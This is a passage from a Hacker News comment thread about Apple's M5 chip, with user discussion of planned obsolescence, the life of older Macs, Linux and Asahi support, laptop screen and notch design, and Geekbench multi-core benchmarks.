              By contrast, good luck trying to get a Mac game from the 90s running natively on any modern Mac without an emulator/VM.

              • varispeed 12 hours ago

                Yup. I was amazed that I could still run software I wrote as a teenager decades ago and it just worked.

          • firecall 9 hours ago

            Is there an argument that, in actuality, this has been to their detriment?

            I'm just asking the question.. ;-)

          • trollbridge 11 hours ago

            What are you talking about? macOS 26 still runs on 2019 x86 Macs.

            • distalx 3 hours ago

              It does feel like planned obsolescence when companies like Apple limit software support for older hardware; Ubuntu runs smoothly on much older devices. They could certainly do better by extending support and focusing on sustainability.

          • umanwizard 12 hours ago

            That doesn't really have anything to do with planned obsolescence. Causing churn for developers is not intended to make people buy more Macs before they should need to, which is what planned obsolescence means.

            • heavyset_go 7 hours ago

              The churn means software eventually stops working on whatever macOS version your hardware EOL'd on. For example, new builds of Firefox and Chrome drop older macOS APIs and therefore can't run on older versions of macOS. This eventually happens to everything, including Homebrew.

            • mschuster91 12 hours ago

              A piece of software I got in 1995 (Earth Siege) is reasonably playable on a modern PC, no VM, no emulator, it just works (albeit with requiring compatibility mode).

              No piece of Mac software anyone bought in the late PPC era can even run (!) natively on a modern Mac, and even early Intel Mac software will not run on the last Intel generation, ever since macOS dropped 32-bit support in userspace entirely. You need to pay the developers for a new version; that's obsolescence by definition. I'm particularly still pissed about the 32-bit removal, as it also killed off WINE running 32-bit apps, which, you can probably guess, include many games that never got a 64-bit Windows binary because they were developed long before Windows x64 became mainstream (or even existed).

              I do love Apple for high quality hardware, but I'll stick the finger to them till the day I die for killing off WINE during the Intel era for no good reason at all.

              • umanwizard 12 hours ago

                I understand all that. Nevertheless, it has nothing to do with planned obsolescence.

                > You need to pay the developers for a new version, that's obsolescence by definition

                Sure, but you don't have to pay Apple.

                The entire point of the idea of planned obsolescence is companies intentionally making their products last less time than they should, so you have to pay that company more money.

                This is a company making it so you might have to pay other companies more money, because backwards compatibility isn't a priority for them. You can be annoyed by that, sure, but it is not the same thing, and is not obviously corrupt like planned obsolescence is.

  • gigatexal 16 hours ago

    Amazing. My M3 Max is going to look like a paperweight very soon. And that's fine by me. When I get an M6 or M7 Max to replace it, it'll be amazing.

    • bombcar 15 hours ago

      I’m trying to find any reason I can that my M1 Max needs replacement; it’s hard. How do you justify it?

      • djtriptych 15 hours ago

        Same. I have an M1 Max Studio and it's just laughing at the little workloads I throw at it (pro photo editing, music production, software dev, generally all at the same time).

        It just never sweats AT ALL - it feels like a decade from obsolescence based on what I'm doing now.

        It would have to be an order of magnitude faster for me to even notice at this point.

        • zahirbmirza 15 hours ago

          Obsolescence for Macs comes when Apple decides not to allow your Mac to update to the latest OS.

          • culi 7 hours ago

            Then you turn it into a Hackintosh or install Linux on the machine instead (Asahi Linux is looking pretty good on Apple silicon).

          • phony-account 15 hours ago

            > Obsolescence for Macs comes when Apple decides not to allow your mac update the OS to the latest one.

            That doesn’t make it obsolete, at all.

            • badc0ffee 14 hours ago

              When they stop releasing security patches for that OS version 2 years later, it becomes riskier to connect the thing to a network, or to take in any data from the outside, really, whether via Bluetooth or a USB drive.

              And then there's 3rd party software that will stop supporting that old OS version, in part because Apple's dev tools make that difficult.

              Eventually, Apple's own services will stop supporting that OS - no convenient iCloud support.

              Finally, the root CA certs bundled with the OS will become too out of date to use.

              I'm planning on putting Linux on my Intel Mac Mini soon. But when an M3+ Mini goes out of support, will we have that option?

              • illusive4080 12 hours ago

                Even my 2017 MBP on macOS 13 still gets security updates. Heck, the iPhone 6 got a security update recently.

                Your points are valid but it’s not 2 years, it’s more than that for big vulnerabilities.

                • badc0ffee 11 hours ago

                  > Even my 2017 MBP on macOS 13 still gets security updates.

                  Has it had one since macOS 26 came out? They usually do 2 versions behind - in the summer, that was macOS 13, but now it's macOS 14.

              • unilynx 14 hours ago

                Don't forget about Boot Camp for the (soon) obsolete Intels.

                With a debloated Windows 10 (which we're not going to connect to the internet anyway) they can live on for older games.

            • jkestner 14 hours ago

              I've got a 2010 MBP that's still perfectly serviceable, but without OS updates I can't get a browser that websites will load cleanly on, can't use Xcode, a bunch of the Apple services the company hooks you on don't work, etc. I used the OpenCore bootloader to extend its life into newer macOSes, but that's getting hard to keep up with. What an (e)waste.

              • snowwrestler 13 hours ago

                I’ve got a “late 2008” MacBook Pro that connects to sites ok in Firefox. That seems to be the browser that does the best at long-term support for old Macs.

                • brucehoult 10 hours ago

                  Both those machines will run the latest Ubuntu just fine, and the latest Chrome (or Firefox) on it.

                  Just copy the LiveCD image onto a USB stick, insert it, boot holding down the Option key, and you can try it without actually installing it (i.e. leaving your macOS untouched).

                • jkestner 11 hours ago

                  Good point. I remembered not getting Firefox to work but that was an even older Mac I was dusting off to run a birdcam installation.

              • davidkwast 13 hours ago

                You can use Ubuntu. I use Ubuntu on a 2009 MBP and on a 2010 too.

                • jkestner 11 hours ago

                  Hadn't thought of doing that - I'm not a natural Linux person myself and I'm repurposing it for an 11yo. But maybe it's not so different from their school Chromebook for what they need. Just removes some of the nice Apple family features and the apps they'd be inheriting, but that's what I get for not paying the tax with new hardware purchases.

                  • 20after4 7 hours ago

                    11 is a great age to start learning Unix.

                    Edit: I know Mac OS X is a Unix and Linux is technically a clone; however, of the two, Linux & GNU is a much better environment to learn in.

              • NetMageSCW 13 hours ago

                It is 15 years old - I think it is past eWaste into antique.

                • hoppp 11 hours ago

                  Nah, antiques are stuff like the Apple II or the Amiga; it was a different world back then.

                  15 years old is just old and has too little RAM.

                  • jkestner 11 hours ago

                    Sure. But my needs haven't exceeded that RAM. I just want to keep doing the things I was doing for years on it happily, but security updates, broken services and website bloat have intervened.

                • jkestner 11 hours ago

                  You're talking to someone who's fixed their microwave several times to keep it going for 20 years.

              • holoduke 13 hours ago

                My old MacBook Air from 2010 has been running Home Assistant on Ubuntu for 6 years now. It's in my fuse/meter room, running 24 hours a day.

            • zahirbmirza 14 hours ago

              Depends on whether you use Xcode or not... I still have my 12-inch MacBook; for work use it is amazing, but I can't run the latest Xcode, making it defunct for some of my uses. It would be fine running Xcode, weak as it is, I'm sure. Liquid Glass might have killed it, though.

            • skor 13 hours ago

              I use one from around that time to teach my kid basic stuff; you can run Linux on it as well.

            • manmal 14 hours ago

              Patches for old OS versions unfortunately don't cover all security issues. Apple often argues that vulns can only be fixed in actively supported versions.

            • zahirbmirza 14 hours ago

              Also, would love to hear any tips you have for eking out more use... Sounds like you may have some...

        • oblio 15 hours ago

          You're not opening enough Chrome tabs. Or Electron apps.

        • kinnth 12 hours ago

          Yup, I'm on an M1 Max laptop. I actually went up to an M4 Pro and went back to the M1 Max; it could handle more trading screens!

        • j45 6 hours ago

          So many articles I've read about the Mac Studio say it could easily be a 10-year computer.

          The additional cooling in it seems to help its performance quite a bit compared to the same chip in a laptop.

        • andrepd 15 hours ago

          You're clearly running low-intensity tasks (pro photo editing, music production, software dev, generally all at the same time) instead of highly-demanding ones (1 jira tab)

        • poultron 15 hours ago

          Obsolescence comes when Apple conveniently "optimizes" a new OS architecture for a new chip... which conveniently, ironically, somehow severely de-optimizes things for the old chips. Suddenly that shiny new OS feels slow and sluggish and clunky, and "damn, I need to upgrade my computer!" They'll whitewash it not as planned obsolescence but as optimization for new products. It doesn't have to be that way, and shouldn't be, but it's incredibly profitable.

          • MPSimmons 15 hours ago

            Maybe by that time ARM linux on this platform will be excellent and we can migrate to it for old gear. I still have a 2011 MBP running Linux on my electronics workbench and it is just fine.

      • burnt-resistor 4 minutes ago

        Did an M1 Max (32 GiB, 1 TB -> 64 GiB, 4 TB - Z14X000HR) upgrade in early 2024 for ~$1800 USD, with ~20 battery cycles and 99% battery health. Avoiding *os 28 because I refuse unusable, battery-wasting bling.

      • smith7018 14 hours ago

        You should wait until next fall if you don't really need to replace your M1 Max. Rumors say Apple's going to redesign the MacBook Pros next year with an OLED screen.

        • jltsiren 13 hours ago

          I would rather buy the last refresh of the old design. Waiting for a redesign is risky, as some redesigns are just bad (like the touchbar MBP). And Apple is opinionated enough that it often refuses to admit its mistakes and sticks with them for years.

          • bee_rider 10 hours ago

            Apple has had missteps of course, but you can usually buy last year’s model, right?

            OLED is much better than other display technologies, and they've done other OLED screen devices. It would be quite surprising to see them screw this up; not impossible, sure. They could screw up some other design element, for example. But it would be somewhat surprising, right? And OLED is a big change, so maybe they won't also feel the need to mess with other stuff.

            • hakunin 10 hours ago

              Everything I recently researched about display technologies says mini-LED has no image retention/burn-in issues and renders fonts better than OLED. It seems you want OLED for media (and mobile, since you often alternate entire screens), IPS for work, and mini-LED as a more expensive compromise without burn-in that does text as well as IPS and media almost as well as OLED. I wonder why they would even want to use OLED on work screens with lots of static content. Did something major change about the tech such that it doesn't suffer these issues anymore?

              • chronogram 6 hours ago

                macOS hasn't used subpixel font rendering since Mojave, and iOS never did, so there's no difference in font rendering on Apple platforms.

              • bee_rider 9 hours ago

                I think OLED burn-in has been mitigated fairly well recently. At least, I have a Linux laptop from 2021 that I use for work as well as fun, with no particular care taken to avoid it, and no burn-in so far.

                Font rendering, hard to say, I think it’s just preference.

                Terminals look very nice with actual-black backgrounds.

                • freeAgent a few seconds ago

                  I have a Samsung QD-OLED monitor from 2023 which has very noticeable burn-in at low brightness levels. This is from the era of "OLED burn-in has been solved," and it's soured me on OLED monitors since I do photography as a hobby and don't want burn-in affecting how I see images on my screen. I think it's fine for televisions, but I don't like it for PC use where I have static windows on my screen for a long time. I even used dark mode and still got burn-in pretty quickly, for example where it draws the border between side-by-side windows (so, a vertical line down the middle of my screen). Once I noticed that, I started resizing my side-by-side windows so their border isn't in the same place every day, but the damage is done.

          • jameslk 10 hours ago

            As someone who went all-in on the 2019 i9 Intel MBP months before Apple announced the M1 MBP, I can tell you this strategy is not always optimal. Years of managing overheating, and underperformance due to said overheating, have not been fun. Especially after I found the benchmarks showing those M1s running circles around the laptop I purchased, for a fraction of the price.

            • hellotheretoday 9 hours ago

              I grabbed a broken 2019 i9 and repaired it. I thought I had fucked up the repair because it kept thermal throttling, but after researching a bit and eventually comparing it to a known-good machine, it appears I did fine; no, it just does that.

              Garbage design.

          • anigbrowl 13 hours ago

            I got an old MBP with the touchbar as payment for a favor last year and I quite like it. I don't know why it gets so much hate.

            • astrospective 12 hours ago

              The butterfly switches break easily, and replacing the entire keyboard because of it is a pain. I held on to my 2015 Intel MBP for ages waiting for them to address that.

            • jltsiren 12 hours ago

              I had one for a few years. The keyboard was bad, and there was no physical Escape key. There were a lot of accidental clicks on the touchbar, as it had a different logic (touch to use rather than press to use) than the other keys, or the function keys on every other keyboard. And I was using USB-A and HDMI adapters all the time, as the laptop lacked essential ports.

              • Telemakhos 10 hours ago

                The first M1 MacBook Pros had both the touchbar and a decent keyboard. I love mine, as long as the driver running the touchbar doesn't crash, which it sometimes does, necessitating a reboot. My main problem is how few programs ever made good use (not just some use) of the touchbar.

                As for the dongle issue, that went away when I upgraded to a USB-C monitor at home and USB-C equipment at work. I can dock to a monitor or plug into a projector to give a presentation and charge with the same cable. At this point I don't want an HDMI port, and I'm kind of sad that the next laptop will probably have a dedicated charging cable.

                • jltsiren 9 hours ago

                  I travel quite a bit. HDMI remains useful, as most monitors / TVs / projectors I encounter still don't have USB-C input. USB-A is also somewhat useful, as I charge various devices from my laptop to avoid dealing with too many international power adapters.

                  The most common ports I need are roughly: 1. USB-C; 2. HDMI; 3. USB-A; 4. second USB-C; 5. third USB-C; 6. second USB-A; 7. DisplayPort; 8. fourth USB-C.

              • jen20 8 hours ago

                I still have both 13" and 15" Touch Bar MacBook Pros from 2016, and the keyboard is hands down my favorite laptop keyboard to type on since the Lenovo X220. The new ones aren't _bad_ but not as nice. The physical escape key doesn't matter to me, I have had it mapped to caps lock forever.

                I also used to use the Touch Bar for a status display for things like tests, it was honestly great. Do not miss the battery life and performance compared to my subsequent Apple Silicon laptops, but definitely miss the keyboard.

            • no_wizard 13 hours ago

              I think it's because of the non-optionality of it. If you could have gotten every model either with or without the touch bar, people could simply have made their choice based on preference.

              In the end they reverted because they were not willing to make it optional. They also never released a touch bar keyboard for desktop, which might have made it more useful.

            • skor 13 hours ago

              No escape key; that's one reason.

              • Mogzol 11 hours ago

                My 2019 MBP has a touch bar and a physical escape key, so at least some models did have one. I agree not having it would make the touch bar way worse. As it is I don't mind it.

        • kossTKR 14 hours ago

          For the love of god, remove the notch; that's the only idiotic branding vestige left.

          • mort96 13 hours ago

            And put the web cam where?

            The notch is bigger than it should be, for sure; I would've loved for it to be narrower. But I don't really mind the trade-off it represents.

            You could add half an inch of screen bezel and make the machine bigger, just to fit the webcam. Or you could remove half an inch of screen, essentially making the "notch" stretch across the whole top of the laptop. Or you could find some compromise spot for the camera, like those Dell laptops that put it near the hinge. Or you can let the screen fill the whole lid of the laptop, with a cut-out for the camera, and design the GUI such that the menu bar fills the part of the screen that's interrupted by the notch.

            I personally don't mind that last option. For my needs, it might very well be the best alternative. If I needed a bigger below-the-notch area, I could get the 16" option instead of the 14" option.

            • joking 9 minutes ago

              I don't have a problem with the notch; I have a problem with the icons not showing in the status bar when there's no room, with no *** way to show them. Is it so difficult to add an overflow button that shows the hidden icons?

            • mirekrusin 6 hours ago

              Two cameras in the top corners, or four, one in each corner, for better Gaussian splatting.

            • bobthepanda 13 hours ago

              I wonder how hard it would be to have a camera 'pop up' from the laptop. (I'm not a hardware guy.)

              • eastbound 12 hours ago

                Some laptops literally have the camera behind the screen. As in, behind pixels. It’s possible and classy.

                • Lammy 11 hours ago

                  My REDMAGIC Android phone is like this too and I love not having a stupid notch cut out of the screen. I've hated them since the very first time I saw a iPhone X. Can't believe such a ridiculous design defect infected Macbooks too :/

                • bobthepanda 12 hours ago

                  do you have a picture of what that looks like? having a hard time conceptualizing that.

                  • Tuna-Fish 12 hours ago

                    It's not visible at all. The camera is just placed behind the screen.

                    OLED screens are inherently transparent; there is just a light-emitting layer in them. You put your camera behind the screen, and either make the few pixels on top of the lens go black when it's on, or use a lot of software to remove the light that comes from the screen and clean up the picture.

              • XorNot 9 hours ago

                My Oppo Reno 2z phone does this, and honestly it's been working great for years. I really like not having a notch.

                Feels like it would be durable enough for a laptop, and it also fulfills the "webcam is physically blocked when off" requirement.

            • hu3 13 hours ago

              The Dell XPS has a webcam, no notch, and the same bezel as MacBooks.

              Maybe it's a patent thing.

              • mort96 12 hours ago

                They have the solution with the web cam near the hinge that I mentioned. I had a couple of Dell XPS laptops like that. It's fine if the webcam is really just an afterthought for you, but it does mean the webcam has a very unflattering angle that's looking up your nostrils.

                I use my webcam enough these days to take part in video meetings that it'd be a pretty big problem for me.

                • gargan 12 hours ago

                  Check out the Dell XPS 13 9345: the webcam is on top but with thinner bezels than a MacBook, it's got a Snapdragon ARM processor for good battery life, an OLED screen, up to 64GB RAM, and it's smaller and lighter than a MacBook Air.

                  The Snapdragon X Elite 2 processor will be out next year for the refreshed model.

                  • y1n0 9 hours ago

                    That top bezel is twice the size of my M4 MBP's.

                    • gargan an hour ago

                      You're looking at the wrong laptop: the Dell XPS 13 9345 has a ~88.6% screen-to-body ratio, while the MacBook Pro 14 M4 2024 has a ~84.6% screen-to-body ratio.

                      The weight is the big one for me - only 2.5 lbs vs 3.4 lbs.

                      Remember the Dell has an 18-month-old processor, with the X Elite 2 coming out next year.

                      Source for all these stats: https://nanoreview.net/en/laptop-compare/dell-xps-13-9345-20...

                • badc0ffee 11 hours ago

                  Also it gives the huge hands effect when you're typing.

                • cyberax 11 hours ago

                  > They have the solution with the web cam near the hinge that I mentioned.

                  Companies tried that. You get very strange-looking up-your-nose pictures.

          • brookst 13 hours ago

            You want a strip of black plastic across the entire top rather than pixels to the left and right of the cameras?

      • croemer 3 hours ago

        Personal workloads that benefit from an upgrade: running a CPU-limited Python script that aligns genomes in parallel on all cores. It's common that I need to wait 2 min for those tasks to complete; shaving off 30 s for a faster iteration loop is meaningful.
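
        For anyone curious, a minimal sketch of that kind of fan-out with the standard library; `align_genome` here is a hypothetical stand-in for the real CPU-bound aligner:

            from concurrent.futures import ProcessPoolExecutor

            def align_genome(name: str) -> str:
                """Hypothetical stand-in for a CPU-bound alignment of one genome."""
                total = sum(i * i for i in range(2_000_000))  # busy work
                return f"{name}: aligned ({total % 97})"

            if __name__ == "__main__":  # needed for the 'spawn' start method on macOS
                genomes = [f"genome_{i}" for i in range(16)]
                # Processes rather than threads, so the GIL doesn't serialize the
                # CPU-bound work; ProcessPoolExecutor defaults to one worker per core.
                with ProcessPoolExecutor() as pool:
                    for result in pool.map(align_genome, genomes):
                        print(result)

        With work spread one-process-per-core like this, wall time scales with single-core speed times core count, which is exactly where the newer chips pay off.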

      • montebicyclelo 15 hours ago

        On the contrary; now might be a good time to get an M1 Max laptop. A second-hand one, ex-corporate, in good condition, with 64GB RAM, is pretty good value compared to new laptops at the same price. It's still a fantastic CPU.

        • ozarkerD 14 hours ago

          That's what I did: bought a used one with 64GB and a dent in the back for ~$1k, a year or so back. Some of the best money I've ever spent.

        • andrei_says_ 13 hours ago

          Where would one look for ex-corporate MacBook pros?

          • montebicyclelo 3 hours ago

            At your own risk: one place is eBay sellers with a large number of positive reviews (and not many negative) who are selling lots of the same type of MacBook Pros. My assumption is they've got a bunch of corporate laptops to sell off.

        • simondotau 13 hours ago

          Honestly the only Apple Silicon e-waste has been their 8GB models. And even those are still perfectly good for most people so long as they use Safari rather than Chrome.

      • dgacmu 12 hours ago

        I finally replaced my M1 mini because of memory capacity (16GB doesn't cut it for me, and jumping to 64 was worth it), but I'm having the same feeling about my M1 Pro MBP with 32GB. It just still works so well for nearly everything I do.

        I'm guessing the M5 Pro may support 64GB but...

      • nu11ptr 15 hours ago

        I am in the same boat, as my Rust compile times are solid. I'm good for now, but with the M4 Max twice as fast, the M5 Max next year could be a tempting upgrade.

      • throw0101d 9 hours ago

        > How do you justify it?

        * I want it.

        * I have met all my other financial obligations.

        * I do not have to go into debt for it.

        * QED

        • SchemaLoad 6 hours ago

          You'd also want to evaluate what it lets you do that improves your life, rather than just "I want it".

          • saagarjha an hour ago

            I think you misunderstood the sentiment behind the comment

      • winstonp 10 hours ago

        Rumor has it the M6 Pro will be a total redesign. Whether that's a good or bad thing depends on how much you trust Apple to nail a next-gen design on the first try again.

      • gigatexal 13 hours ago

        I do a lot with VMs and other memory-intensive things, so I went with 128GB of RAM. I'm hoping for a laptop with 256GB+ in a few generations, and one with more or less double the oomph would be nice. Everything can be faster; bring it on!

      • nine_k 8 hours ago

        Running AI inference faster, of course!

      • timcobb 9 hours ago

        Compilation times?

      • seanmcdirmid 6 hours ago

        > How do you justify it?

        Local LLMs.

        • gigatexal 4 hours ago

          Yup, LM Studio loves RAM.

      • dzhiurgis 10 hours ago

        Weird timing, but my M1 started lagging out recently. Must be just in my head.

      • varispeed 12 hours ago

        I have an M1 Max with 32GB, and I think I'll go with the M5 Max simply because I need more RAM. I am constantly swapping about 16GB. I don't feel it that much, but it bothers me.

      • zer0zzz 12 hours ago

        I have an easy one: Asahi Linux only runs on M1 and M2 at the moment.

    • grishka 11 hours ago

      My M1 Max works just fine. Everything is as snappy as it was the day I bought it. I don't see any reason it might need a replacement any time soon. (The fact that I don't install major system updates unless absolutely necessary probably helps too)

    • rootusrootus 15 hours ago

      I was thinking similar thoughts about my M2 Max MBP. I look at the newer chips and wonder at what point the base M chip will outperform my M2 Max (or has it happened already?). I'll probably hold onto it a while anyway - I think it will be a while before I find 96GB limiting or the CPU slow enough for my purposes, but I'd still like to know how things are progressing.

      • lagadu an hour ago

        Base M4 was already slightly outperforming the M2 Max in CPU. GPU-wise it's nowhere near close.

  • rick_dalton 15 hours ago

    The multi-core Geekbench score for the M5 is for the 9-core version, iirc. The 10-core score isn't out yet as far as I know.

  • alberth 14 hours ago

    Did TSMC 2nm slip to next year, or was it always planned to be 2026?

    • hooch 12 hours ago

      There was always one more iteration of 3nm in the plan.

  • ElijahLynn 15 hours ago

    Thank you! Since this is the top-rated comment, can you add the M1 and M2 as well?

  • LarsDu88 14 hours ago

    Does this mean the M5 is seriously as fast as my Intel 13900 CPU?

  • jay_kyburz 14 hours ago

    Serious questions. How is Asahi these days? Is it ready as a daily driver? Is it getting support from Apple or are they hostile to it? Are there missing features? And can I run KDE on it?

    • pbasista 13 hours ago

      > How is Asahi these days?

      Much less active than it used to be when it was run by Hector Martin. Core development is a lot slower, although the graphics stack, for instance, has reached a very mature state recently.

      > Is it ready as a daily driver?

      It depends. Only M1 and M2 devices are reasonably well-supported. There is no support for power-efficient sleep, DisplayPort, Thunderbolt, video decoding or encoding, or Touch ID. The speakers overheat and turn off momentarily when playing loud for a longer period of time. The audio stack in general had to be built from the ground up, and it seems to me like there are bits and pieces still missing or configured sub-optimally.

      > Is it getting support from Apple?

      Not that I am aware of.

      > are they (Apple) hostile to it?

      Not to my knowledge.

      > Are there missing features?

      Plenty, as described above. There has been some work done recently on Thunderbolt / DisplayPort. Quite a few other features are listed as WIP on their feature support page.

      > Can I run KDE on it?

      Of course. KDE Plasma on Fedora is Asahi Linux's "flagship" desktop environment.

      • neobrain 3 hours ago

        Good and fair comment. Just adding some nuance:

        > There is no support for power-efficient sleep

        "power-efficient sleep" refers to discharging 1-2% battery over night rather than 10-20%. I.e. there's room for improvement, but the device can still be used without worrying much about battery life regardless (especially given how far a full charge gets you even without sleep).

        > Display Port, Thunderbolt

        Big item indeed, but it's actively worked on and getting there (as you mentioned).

        > video decoding or encoding

        Hurts battery performance, but otherwise I never noticed any effect. YMMV for 4K content.

        > Touch ID

        Annoying indeed, and no one has worked on this AFAIK.

        > The speakers overheat and turn off momentarily when playing loud for a longer period of time. The audio stack in general had to be built from the ground up and it seems to me like there are bits and pieces still missing or configured sub-optimally.

        Sad to hear since I thought the audio heat model was robust enough to handle all supported devices. On my M1 Air I've never seen anything like this, but perhaps devices with more powerful speakers are more prone to it?

      • SchemaLoad 6 hours ago

        Am I misrepresenting the situation, or did the whole project seemingly fall apart over an argument on the mailing list between Hector and Linus Torvalds about getting some driver merged?

    • SXX 14 hours ago

      On a MacBook Air M1, Asahi is pretty usable when it comes to hardware support, and has been for at least a year.

      Though either Fedora itself, how it's built for Asahi, or just running it with little disk space ends up freezing on boot after random updates. It happened twice, once without even rpmfusion enabled. Either some weird btrfs issue or I don't know what.

      I've been a Linux guy for two decades and don't do anything fancy, so this is weird. I switched to Asahi Ubuntu on ext4 and it's working great so far.

    • strogonoff 12 hours ago

      It is a shame Asahi supports only up to around M2 or so, because I really wanted to use it.

    • jay_kyburz 14 hours ago

      Nevermind, found this. Still a ways to go: https://asahilinux.org/docs/platform/feature-support/m4/#tab...

      • filmgirlcw 13 hours ago

        Yeah, given all the people with passion/ability for low-level reverse engineering have left the project, I don’t think we should ever expect to get greater than M2 support from Asahi. Maybe one day another project will pick up the ideas, but for anyone not wanting to use years old hardware, the dream of Linux almost natively existing on modern Apple silicon remains just that: a dream.

      • zargon 14 hours ago

        Asahi will probably only ever be feasible for years-old hardware. macOS is a total non-starter for me, so maybe one day I’ll end up with one of these, but only as some kind of tertiary / retro machine.

        • ar_lan 7 hours ago

          Why is it a non-starter for you?

          • jay_kyburz 4 hours ago

            Not the OP, but its a non starter for me because, I _was_ a mac guy for 10 years or so, but I changed job to one that required I use windows for game dev, and I discovered how locked in I was, and how painful it was to change. I'm not going back, no matter how nice the hardware is.

  • hinkley 11 hours ago

    That's a lot of memory bandwidth. Kinda surprised geekbench doesn't benefit more from the fatter pipe.

  • morshu9001 15 hours ago

    And the fastest M4 Max was already the fastest single- and multi-core CPU by a decent margin, while the fastest non-Apple CPUs were specialized for either single or multi.

    • AnthonyMouse 14 hours ago

      The single-thread performance of modern high-performance CPUs is all very close. Apple's latest usually has a small advantage because they're the first to use TSMC's latest nodes, which is good for something like 15-20%.

      The fastest multicore CPUs are the ones with a lot of cores, e.g. 64+ core Threadrippers. These have approximately the same single-core performance as everything else from the same generation because single-core performance isn't affected much by number of cores or TDP, and they use the same cores.

      Everyone also uses Geekbench to compare things to Apple CPUs but the latest Geekbench multi-core is trash: https://dev.to/dkechag/how-geekbench-6-multicore-is-broken-b...

      • musictubes 8 hours ago

        That article points out that GB5 and GB6 test multi-core differently. The author notes that GB6 is supposed to approach performance the way most consumer programs actually work. GB5 is better suited for testing things like servers where every core is running independent tasks.

        The only “evidence” they give that GB6 is “trash” is that it doesn’t show increasing performance with more and more cores with certain tests. The obvious rejoinder is that GB6 is working perfectly well in testing that use case and those high core processors do not provide any benefit in that scenario.

        If you’re going to use synthetic benchmarks, it’s important to use one that reflects your actual use case. Sounds like GB6 is a good general-purpose benchmark for most people. It doesn’t make any sense for server use, and maybe it also isn’t useful for other use cases, but GB6 isn’t trash.

        • AnthonyMouse 5 hours ago

          > The only “evidence” they give that GB6 is “trash” is that it doesn’t show increasing performance with more and more cores with certain tests. The obvious rejoinder is that GB6 is working perfectly well in testing that use case and those high core processors do not provide any benefit in that scenario.

          The problem with this rejoinder is, of course, that you are then testing applications that don't use more cores while calling it a "multi-core" test. That's the purpose of the single core test.

          Meanwhile "most consumer programs" do use multiple cores, especially the ones you'd actually be waiting on. 7zip, encryption, Blender, video and photo editing, code compiles, etc. all use many cores. Even the demon scourge JavaScript has had thread pools for a while now and on top of that browsers give each tab its own process.

          It also ignores how people actually use computers. You're listening to music with 30 browser tabs open while playing a video game and the OS is doing updates in the background. Even if the game would only use 6 cores by itself, that's not what's happening.

          • morshu9001 4 hours ago

            Ok, I had time to read through this, and yeah, I agree: a multicore test should not be waiting on so much shared state.

            There are examples of programs that aren't totally parallel or serial; they'll scale to maybe 6 cores on a 32-core machine. But there's so much variation in that, idk how you'd pick the right amount of sharing, so the only reasonable thing to test is something embarrassingly parallel or close to it. Geekbench 6's scaling curve is way too flat.
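
            For what it's worth, the embarrassingly parallel end is easy to demo (a toy sketch, nothing like Geekbench's actual workloads): independent CPU-bound tasks with no shared state, which should scale close to linearly exactly where GB6's curve goes flat.

                # Toy scaling test: the same fixed pile of work, more workers each run.
                import time
                from concurrent.futures import ProcessPoolExecutor

                def burn(n: int) -> int:
                    total = 0
                    for i in range(n):  # independent work, no shared state
                        total += i * i
                    return total

                if __name__ == "__main__":
                    work = [2_000_000] * 32
                    for workers in (1, 2, 4, 8):
                        t0 = time.perf_counter()
                        with ProcessPoolExecutor(max_workers=workers) as pool:
                            list(pool.map(burn, work))
                        print(f"{workers} workers: {time.perf_counter() - t0:.2f}s")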

            • AnthonyMouse an hour ago

              Yeah. I think it might even be worse than that.

              The purpose of a multi-core benchmark is that if you throw a lot of threads at something, it can move where the bottleneck is. With one thread neither a desktop nor HEDT processor is limited by memory bandwidth, with max threads maybe the first one is and the second one isn't. With one thread everything is running at the boost clock, with max threads everything may be running at the base clock. So the point of distinguishing them is that you want to see to what extent a particular chip stumbles when it's fully maxed out.

              But tanking the performance with shared state will load up the chip without getting anything in return, which isn't even representative of the real workloads that use an in-between number of threads. The 6-thread consumer app isn't burning max threads on useless lock contention, it just only has 6 active threads. If you have something with 32 cores and 64 threads and it has a 5GHz boost clock and a 2GHz base clock, it's going to be running near the boost clock if you only put 6 threads on it.

              It's basically measuring the performance you'd get from a small number of active threads at the level of resource contention you'd have when using all the threads, which is the thing that almost never happens in real-world cases because they're typically alternatives to each other rather than things that happen at the same time.

      • morshu9001 14 hours ago

        I was going by Geekbench. If it's broken then yeah.

  • LordDragonfang 14 hours ago

    Interesting to see that over 5 years (M1 was 2020), the benchmark performance has not quite doubled. Is this an indictment of Moore's law, or just Apple over-speccing the M1 and slowly decreasing that over time?

    • imoverclocked 13 hours ago

      Moore's law has never been an absolute, and it's also about the number of transistors per mm^2, not speed. Sometimes progress is a little faster and sometimes it's a little slower.

    • hinkley 11 hours ago

      More than double the memory bandwidth. Processors can't do much while they're stalled waiting for data to load.

  • B1FF_PSUVM 15 hours ago

    Thank you. Looking at replacing an Intel MacBook Air, I hope there are price drops on the "outdated" M4s (although an M2 phased out early this year would do well enough...)

    • testing22321 11 hours ago

      I replaced an Intel MacBook Pro with a used M1 Air. By far the fastest computer I have ever used. Massive, massive leap.

      • stefanfisk 6 hours ago

        Yeah, going from Intel to M1 is IMHO somewhat comparable to going from HDD to SSD.

  • jjcm 15 hours ago

    They're going to have a hard time selling the M5 when compared to the M4 Pro. Geekbench for that chip is 3843/22332: slightly slower single-core than the M5 but better multi-core. It also has Thunderbolt 5 instead of 4.

    • GeekyBear 15 hours ago

      The numbers for M5 Geekbench are for the binned iPad Pro version with one performance core disabled.

      It's the only M5 device that leaked to the public early.

    • NetMageSCW 13 hours ago

      Fortunately they will be selling the M5 Pro against the M4 Pro (and, more likely, their expectation is that no one with the current Pro is going to upgrade after one generation), so it will be easier.

gcr 20 hours ago

So how many hardware systems does Apple silicon have for doing matrix multiplies now?

1. CPU, via SIMD/NEON instructions (just dot products)

2. CPU, via AMX coprocessor (entire matrix multiplies, M1-M3)

3. CPU, via SME (M4)

4. GPU, via Metal (compute shaders + simdgroup-matrix + mps matrix kernels)

5. Neural Engine via CoreML (advisory)

Apple also appears to be adding a “Neural Accelerator” to each core on the M5?
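
For what it's worth, two of these paths are easy to poke at from user code. A minimal sketch with PyTorch, assuming a macOS build whose CPU path goes through Apple's Accelerate BLAS (which is what dispatches to NEON and, where present, AMX/SME; that routing is Apple's, not something the script controls):

    # Time the same matmul on the CPU path and on the GPU ("mps") path.
    import time
    import torch

    n = 2048
    a = torch.randn(n, n)
    b = torch.randn(n, n)

    t0 = time.perf_counter()
    a @ b
    print(f"CPU:         {time.perf_counter() - t0:.4f}s")

    if torch.backends.mps.is_available():
        ag, bg = a.to("mps"), b.to("mps")
        torch.mps.synchronize()  # MPS dispatch is asynchronous
        t0 = time.perf_counter()
        ag @ bg
        torch.mps.synchronize()  # wait for the GPU before reading the clock
        print(f"GPU (Metal): {time.perf_counter() - t0:.4f}s")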

  • throwaway31131 15 hours ago

